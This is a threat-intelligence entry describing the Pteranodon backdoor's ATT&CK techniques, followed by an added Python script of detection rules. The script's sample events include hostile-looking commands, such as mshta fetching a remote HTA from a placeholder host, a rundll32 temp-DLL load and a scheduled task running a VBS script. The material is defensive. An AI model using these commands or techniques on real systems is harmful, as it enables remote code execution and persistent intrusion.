Pteranodon

Pteranodon is a custom backdoor used by Gamaredon Group.[1]

ID: S0147
Associated Software: Pterodo
Type: MALWARE
Platforms: Windows
Version: 2.1
Created: 31 May 2017
Last Modified: 23 August 2022

Associated Software Descriptions

Name Description
Pterodo [2][3]

Techniques Used

Domain ID Name Use
Enterprise T1140 Deobfuscate/Decode Files or Information

Pteranodon can decrypt encrypted data strings prior to using them.[4]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Pteranodon copies itself to the Startup folder to establish persistence.[1]

Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

Pteranodon can use cmd.exe for execution on victim systems.[1][2]

.005 Command and Scripting Interpreter: Visual Basic

Pteranodon can use a malicious VBS file for execution.[2]

Enterprise T1113 Screen Capture

Pteranodon can capture screenshots at a configurable interval.[1][5]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Pteranodon can use HTTP for C2.[1]

Enterprise T1074 .001 Data Staged: Local Data Staging

Pteranodon creates various subdirectories under %Temp%\reports\% and copies files to those subdirectories. It also creates a folder at C:\Users\\AppData\Roaming\Microsoft\store to store screenshot JPEG files.[1]

Enterprise T1083 File and Directory Discovery

Pteranodon identifies files matching certain file extensions and copies them to subdirectories it created.[1]

Enterprise T1106 Native API

Pteranodon has used various API calls.[4]

Enterprise T1027 .007 Obfuscated Files or Information: Dynamic API Resolution

Pteranodon can use a dynamic Windows hashing algorithm to map API components.[4]

Enterprise T1070 .004 Indicator Removal: File Deletion

Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.[1]

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.[2]

.011 System Binary Proxy Execution: Rundll32

Pteranodon executes functions using rundll32.exe.[1]

Enterprise T1497 Virtualization/Sandbox Evasion

Pteranodon has the ability to use anti-detection functions to identify sandbox environments.[5]

Enterprise T1105 Ingress Tool Transfer

Pteranodon can download and execute additional files.[1][2][5]

Enterprise T1041 Exfiltration Over C2 Channel

Pteranodon exfiltrates screenshot files to its C2 server.[1]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Pteranodon schedules tasks to invoke its components in order to establish persistence.[1][2]
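As an added example (it is not part of this ATT&CK entry and not vendor or MITRE tooling), the script below turns the host-side behaviours listed above into simple detection rules and runs them over a handful of constructed, simplified process-creation and file-creation events. The event layout (`type`, `image`, `cmdline`, `path`), the expansion of `%Temp%` to `AppData\Local\Temp`, the sample paths and URL, and the extra conditions on the rundll32 and schtasks rules (DLL or script under a user-writable directory, task action pointing at a script host) are all assumptions made for illustration; the staging directory, the screenshot folder, the Startup-folder copy and the mshta/rundll32/scheduled-task usage come from the entry itself.

```python
"""Rule-based triage of process and file events for Pteranodon-style behaviour.

Added example, not from the ATT&CK page or from any vendor product. The event
shapes below are an assumed simplification of Sysmon-style process-creation
(type "process") and file-creation (type "file") records, and every sample
event is constructed for this demonstration.
"""
import re

# Constructed sample telemetry (hypothetical host, user "alice").
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/update.hta"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,EntryPoint"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\Microsoft\store\1234.jpg"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Local\Temp\reports\docs\report.docx"},
    {"type": "file", "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                             r"\Start Menu\Programs\Startup\svc.exe"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 10 /tn Updater /tr "wscript u.vbs"'},
    # Benign activity that should not fire any rule.
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "file", "path": r"C:\Users\alice\Documents\notes.txt"},
]

# Assumption: %Temp% for a user expands to <profile>\AppData\Local\Temp.
USER_TEMP = r"\\appdata\\local\\temp\\"


def _proc_is(event, exe_name):
    """True if the event is a process start of the given system binary."""
    return (event.get("type") == "process"
            and event.get("image", "").lower().endswith("\\" + exe_name))


def _path_matches(event, pattern):
    """True if the event is a file event whose path matches the regex."""
    return (event.get("type") == "file"
            and re.search(pattern, event.get("path", ""), re.I) is not None)


# (technique id, human-readable reason, predicate over one event)
RULES = [
    # T1218.005: mshta.exe handed a URL, i.e. a remotely hosted HTA.
    ("T1218.005", "mshta.exe launched with a URL argument",
     lambda e: _proc_is(e, "mshta.exe")
     and re.search(r"https?://", e["cmdline"], re.I) is not None),
    # T1218.011 (heuristic, assumption): rundll32 loading a DLL from user temp.
    ("T1218.011", "rundll32.exe loading a DLL from the user temp directory",
     lambda e: _proc_is(e, "rundll32.exe")
     and re.search(USER_TEMP, e["cmdline"], re.I) is not None),
    # T1053.005 (heuristic, assumption): task creation whose action is a script host.
    ("T1053.005", "schtasks /create with a script-host action",
     lambda e: _proc_is(e, "schtasks.exe")
     and "/create" in e["cmdline"].lower()
     and re.search(r"\b(wscript|cscript|mshta)\b", e["cmdline"], re.I) is not None),
    # T1074.001: files written into the %Temp%\reports\ staging tree.
    ("T1074.001", "file staged under %Temp%\\reports\\",
     lambda e: _path_matches(e, USER_TEMP + r"reports\\")),
    # T1074.001: JPEG screenshots stored under AppData\Roaming\Microsoft\store.
    ("T1074.001", "JPEG written to AppData\\Roaming\\Microsoft\\store",
     lambda e: _path_matches(
         e, r"\\appdata\\roaming\\microsoft\\store\\[^\\]+\.jpe?g$")),
    # T1547.001: executable or script copied into the user's Startup folder.
    ("T1547.001", "executable dropped into the Startup folder",
     lambda e: _path_matches(
         e, r"\\start menu\\programs\\startup\\[^\\]+\.(exe|vbs|lnk|bat|cmd)$")),
]


def scan(events):
    """Return a list of (technique_id, reason, event) for every rule hit."""
    hits = []
    for event in events:
        for technique, reason, predicate in RULES:
            if predicate(event):
                hits.append((technique, reason, event))
    return hits


def summarize(events):
    """Return {technique_id: hit_count} for a batch of events."""
    counts = {}
    for technique, _reason, _event in scan(events):
        counts[technique] = counts.get(technique, 0) + 1
    return counts


if __name__ == "__main__":
    for technique, reason, event in scan(SAMPLE_EVENTS):
        print(f"{technique:10} {reason}: {event.get('cmdline') or event.get('path')}")
```

Rules that key on specific paths (the staging tree, the screenshot folder) are the most precise; the rundll32 and schtasks rules are deliberately broader and will need tuning against an environment's normal software before they are used for alerting rather than hunting.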

Groups That Use This Software

References